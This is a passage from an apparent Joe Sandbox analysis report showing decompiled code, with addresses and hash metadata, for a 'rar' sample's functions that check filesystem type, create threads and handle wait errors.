				if (E00007FF67FF650B719B4(E00007FF67FF650B719B4(GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??), _t9, 0x50b81d78), _t10, L"FAT32") != 0) goto 0x50b33784;
				goto 0x50b3378a;
				return E00007FF67FF650B69D10(0, _t23, _a4680 ^ _t47);
			}















                                                                                                            0x7ff650b336f3
                                                                                                            0x7ff650b336f8
                                                                                                            0x7ff650b336fb
                                                                                                            0x7ff650b33705
                                                                                                            0x7ff650b3370d
                                                                                                            0x7ff650b33713
                                                                                                            0x7ff650b3371b
                                                                                                            0x7ff650b33720
                                                                                                            0x7ff650b33728
                                                                                                            0x7ff650b3372d
                                                                                                            0x7ff650b3373c
                                                                                                            0x7ff650b3373f
                                                                                                            0x7ff650b33744
                                                                                                            0x7ff650b33749
                                                                                                            0x7ff650b33756
                                                                                                            0x7ff650b3375f
                                                                                                            0x7ff650b3376b
                                                                                                            0x7ff650b33774
                                                                                                            0x7ff650b33780
                                                                                                            0x7ff650b33786
                                                                                                            0x7ff650b337a2

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationVolumeswprintf
                                                                                                            • String ID: FAT$FAT32
                                                                                                            • API String ID: 989755765-1174603449
                                                                                                            • Opcode ID: 8bf2cdadbd5e28ceb5d4c9bff1192fd530fb0267603f6aae5f546b4368979679
                                                                                                            • Instruction ID: a0e0004ebefa53a4a2ab38168f1dd80746250101bccf922c72dadee9d7fa5b97
                                                                                                            • Opcode Fuzzy Hash: 8bf2cdadbd5e28ceb5d4c9bff1192fd530fb0267603f6aae5f546b4368979679
                                                                                                            • Instruction Fuzzy Hash: 5311B271618A83A1E7609B14E8C16E673A4FF86384F580030E64ED6B55DF2DE505CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5B2EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E00007FF67FF650B5B2EC(void* __ebx, long long __rbx, intOrPtr* __rcx, long long __rsi, void* __rbp, char _a8, long long _a16, long long _a24) {
				long long _v16;
				signed int _v24;
				void* __rdi;
				int _t22;
				intOrPtr _t27;
				long long _t34;
				intOrPtr* _t36;
				signed long long _t44;
				long long _t46;

				_a16 = __rbx;
				_a24 = __rsi;
				_t36 = __rcx;
				if ( *__rcx <= 0) goto 0x50b5b38e;
				_t34 =  &_a8;
				_t53 = __rcx;
				_v16 = _t34;
				_v24 = _v24 & 0x00000000;
				CreateThread(??, ??, ??, ??, ??, ??);
				_t46 = _t34;
				if (_t34 != 0) goto 0x50b5b364;
				E00007FF67FF650B2C95C(_t34, 0x50ba7ab8, L"CreateThread failed", E00007FF67FF650B5B490, __rcx);
				E00007FF67FF650B2CC94(__ebx, 0, 0x10000, _t34, __rcx, _t44, _t46, __rbp, E00007FF67FF650B5B490);
				_t7 = _t46 + 2; // 0x2
				E00007FF67FF650B2C930(_t7, _t34, _t36, 0x50ba7ab8, L"CreateThread failed", E00007FF67FF650B5B490, _t53);
				 *((long long*)(_t36 + 8 + _t44 * 8)) = _t46;
				 *((intOrPtr*)(_t36 + 0x208)) =  *((intOrPtr*)(_t36 + 0x208)) + 1;
				_t27 =  *0x50bb3030; // 0x0
				if (_t27 == 0) goto 0x50b5b384;
				_t22 = SetThreadPriority(??, ??);
				if (1 -  *_t36 < 0) goto 0x50b5b308;
				return _t22;
			}












                                                                                                            0x7ff650b5b2ec
                                                                                                            0x7ff650b5b2f1
                                                                                                            0x7ff650b5b2fd
                                                                                                            0x7ff650b5b302
                                                                                                            0x7ff650b5b308
                                                                                                            0x7ff650b5b30d
                                                                                                            0x7ff650b5b310
                                                                                                            0x7ff650b5b31c
                                                                                                            0x7ff650b5b328
                                                                                                            0x7ff650b5b32e
                                                                                                            0x7ff650b5b334
                                                                                                            0x7ff650b5b344
                                                                                                            0x7ff650b5b350
                                                                                                            0x7ff650b5b355
                                                                                                            0x7ff650b5b35f
                                                                                                            0x7ff650b5b364
                                                                                                            0x7ff650b5b369
                                                                                                            0x7ff650b5b36f
                                                                                                            0x7ff650b5b377
                                                                                                            0x7ff650b5b37e
                                                                                                            0x7ff650b5b388
                                                                                                            0x7ff650b5b39d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreatePriority
                                                                                                            • String ID: CreateThread failed
                                                                                                            • API String ID: 2610526550-3849766595
                                                                                                            • Opcode ID: 5a4e9d730a61ab1f0a4ddc5474ed466aae9be7fa6752001cf59ea408af1c3ab9
                                                                                                            • Instruction ID: 97d9efea1d63bc8dba278db1a0896b83083afaafe2839c9ad3d7f2d8ac02ce46
                                                                                                            • Opcode Fuzzy Hash: 5a4e9d730a61ab1f0a4ddc5474ed466aae9be7fa6752001cf59ea408af1c3ab9
                                                                                                            • Instruction Fuzzy Hash: FF115E35A18A43A1E751DB10E8801797370FB86794F584131E64EA2769EF3EE546C744
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5B2A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00007FF67FF650B5B2A4(void* __edx, void* __rbx) {
				long _t2;
				void* _t14;
				void* _t15;

				if (WaitForSingleObject() != 0xffffffff) goto 0x50b5b2e7;
				_t2 = GetLastError();
				r8d = r8d | 0xffffffff;
				r9d = _t2;
				E00007FF67FF650B2C95C(r8d, 0x50ba7ab8, L"\nWaitForMultipleObjects error %d, GetLastError %d", _t14, _t15);
				return E00007FF67FF650B2C930(2, r8d, __rbx, 0x50ba7ab8, L"\nWaitForMultipleObjects error %d, GetLastError %d", _t14, _t15);
			}






                                                                                                            0x7ff650b5b2b4
                                                                                                            0x7ff650b5b2b6
                                                                                                            0x7ff650b5b2bc
                                                                                                            0x7ff650b5b2c7
                                                                                                            0x7ff650b5b2d1
                                                                                                            0x7ff650b5b2eb

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF650B5B1A7,?,?,?,00007FF650B36532,?,?,?), ref: 00007FF650B5B2AB
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF650B5B1A7,?,?,?,00007FF650B36532,?,?,?), ref: 00007FF650B5B2B6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastObjectSingleWait
                                                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                            • API String ID: 1211598281-2248577382
                                                                                                            • Opcode ID: eb325152e8a71e69ba5963251afbf0be13b11c174d9451b7b7686f5b7f05f0c7
                                                                                                            • Instruction ID: 43e76460055cf9e9ff8536a4e6fe183f705d6a501ecd2a8047024b0ef9df20e7
                                                                                                            • Opcode Fuzzy Hash: eb325152e8a71e69ba5963251afbf0be13b11c174d9451b7b7686f5b7f05f0c7
                                                                                                            • Instruction Fuzzy Hash: 6EE04825E1880371E5406725DCC507432516F57374F984331D03FE17F19F2ED5858351
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%